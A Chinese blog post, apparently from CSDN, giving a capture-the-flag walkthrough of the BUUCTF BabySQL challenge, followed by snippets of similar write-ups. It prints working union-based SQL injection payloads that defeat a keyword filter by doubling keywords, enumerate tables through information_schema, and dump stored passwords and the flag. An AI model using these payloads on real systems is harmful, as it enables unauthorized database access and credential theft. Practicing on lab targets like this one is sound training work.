BUUCTF WEB [极客大挑战 2019]BabySQL

最新推荐文章于 2024-01-10 22:09:00 发布
最新推荐文章于 2024-01-10 22:09:00 发布
阅读量159 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124219790
版权

BUUCTF WEB [极客大挑战 2019]BabySQL

  • 进入环境后尝试万能密码登录失败,尝试常规sql注入

  • check.php?username=1&password=2' union select 1,2,3;#

    回显

    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1,2,3;#'' at line 1

    得到注入点

  • 观察回显报错,发现union select被过滤掉了,可能是被replace()函数替换为空字符串

    check.php?username=1&password=2' ununionion seselectlect 1,2,3;#

    回显

    Login Success!
Hello 2!
Your password is '3'

    得到回显位置,开始注入

  • 查询表名

    ununionion seselectlect 1,2,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=database());#

'b4bsql,geekuser'

    查询列名

    ununionion seselectlect 1,2,(selselectect group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_name='b4bsql');#

'id,username,password'

    查询密码

    ununionion seselectlect 1,2,(seselectlect group_concat(passwoorrd) frfromom b4bsql);#

'i_want_to_play_2077,sql_injection_is_so_fun,do_you_know_pornhub,github_is_different_from_pornhub,you_found_flag_so_stop,i_told_you_to_stop,hack_by_cl4y,flag{e5cc7e5a-dc6d-4251-963a-e641acea493e}'

  • 得到flag

    flag{e5cc7e5a-dc6d-4251-963a-e641acea493e}
Y1Daa
关注
专栏目录
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 947
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
BUUCTF-Web】[极客挑战 2019]BabySQL
weixin_49298681的博客
01-05 272
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
BUUCTF - web - BabySQL
1tachi的博客
11-04 263
文章目录判断注入类型判断字段数判断回显点查表查字段查数据 判断注入类型 尝试万能密码:'1 or 1=1 -- qwe 发现仅剩下1=1 -- qwe,可能ban掉了"or"关键词 尝试双写:1' oorr 1=1 -- qwe 登陆成功,可能以后都要双写了 判断字段数 1' oorrder bbyy 3 -- qwe 看来有三个字段 判断回显点 1' ununionion seselectlect 1,2,3 -- qwe 回显点是2和3 查表 1' ununionion seselectlect
buuctf-web-[极客挑战 2019]BabySQL-wp
居上
07-16 222
[极客挑战 2019]BabySQL 知识点 双写绕过 过程 主页是一个登录框 随便输入两个参数,发现是传入的是get型参数 首先注入肯定存在,先尝试联合查询注入: check.php?username=admin%27+union+select+1%2C2%2C3%23&password=admin 失败,双写union 和 select可绕过 check.php?username=admin%27+ununionion+seselectlect+1%2C2%2C3%23&pa
BUUCTF web BabySQL
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-18 75
进入靶场,老办法随便输入看一下。
BUUCTF WEB BabySql
qq_41696858的博客
09-03 308
题其实没什么,就是一个双写绕过waf的问题 按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显 经过测试,waf过滤了or,by那么爆破列数的时候(直接输入order by 1会回显der 1): admin’ oorrder bbyy 1# 测试到4的时候会出现unknown_column,那么列数是3 -1’ ununionion selselectect 1,2,3# 下面爆破数据库,union select同样被过滤,同样双写 -1’ ununionion selselect
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 379
BUUCTF的[极客挑战 2019]BabySQL 1
BUUCTF-WEB
ccfly1012的博客
11-02 3865
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3757
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客挑战 2019]Http 修改头 [...
BUUCTF Web [极客挑战 2019]BabySQL
网安小趴菜
08-31 443
BUUCTF Web [极客挑战 2019]BabySQL
BUUCTF WEB Babysqli1
qq_41696858的博客
10-18 206
这题考的是sql注入 打开场景,一个登录界面 先尝试下,admin’,根据回显判断,用户名是admin没错,而且是单引号闭合 尝试万能密码,admin’ or ‘1’=‘1,发现是don’t hack me看来是有waf 但是尝试union这类词,发现他能过waf,那么尝试联合注入看看 首先要确定列数,不幸的是order触发了waf,需要大小写绕过 admin’ Order by 3#和admin’ Order by4#回显不一样,那么可以确认是三列 下面确定admin在那一列, a’ union sele
BUUCTF_Web——[极客挑战 2019]BabySQL
Ho1aAs‘s Blog
03-16 304
既然是SQL注入,先测试是字符还是整型 ?username=admin&password=admin' # You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 报错,将井号编码,成功绕过 下一步,联合查询爆出注入点所在处 ?username=admin
BUUCTF之[极客挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 1900
BUUCTF之[极客挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 3950
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
buuctf 极客挑战 babysql
SopRomeo的博客
01-17 1694
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双写,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
BUUCTF-sql双写绕过
m0_64180167的博客
04-06 638
打开环境 查看什么类型输入字符型我们开始尝试万能密码发现返回的东西和我们输入不一样 or没了过滤了or这个是关键 我们使用双写绕过得到了账号密码我们开始sql注入发现or 过滤了 我们看看还是报错 我们接着看看是不是过滤了 by 因为如果过滤了der 他会返回or成功了 三个字段我们开始爆破数据库得到数据库名 geek开始爆表开始爆数据都是返回这些名得到flag。
buuctf[极客挑战 2019]BabySQL--联合注入、双写过滤
最新发布
weixin_61060664的博客
01-10 1601
有回显: The used SELECT statements have a different number of columns。有回显:版本为:“ 10.3.18-MariaDB!1' or'1'='1 失败。有回显,字段名为flag。
BUUCTF[极客挑战 2019]LoveSQL
../../../../../../../
06-11 256
打开发现用户登录界面,尝试一下万能密码 跳转到check界面并得到登录名及密码 尝试解码,解码失败,进行注入 先查询字段数 ?username=admin%27+order+by+3%23&password=1 页面回显成功,再试试4 ?username=admin%27+order+by+4%23&password=1 注:在url进行查询,#要用url编码%23代替 页面回显失败,可以知道有三个字段 接着我们利用union select 进行回显点查询 ?username=1
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值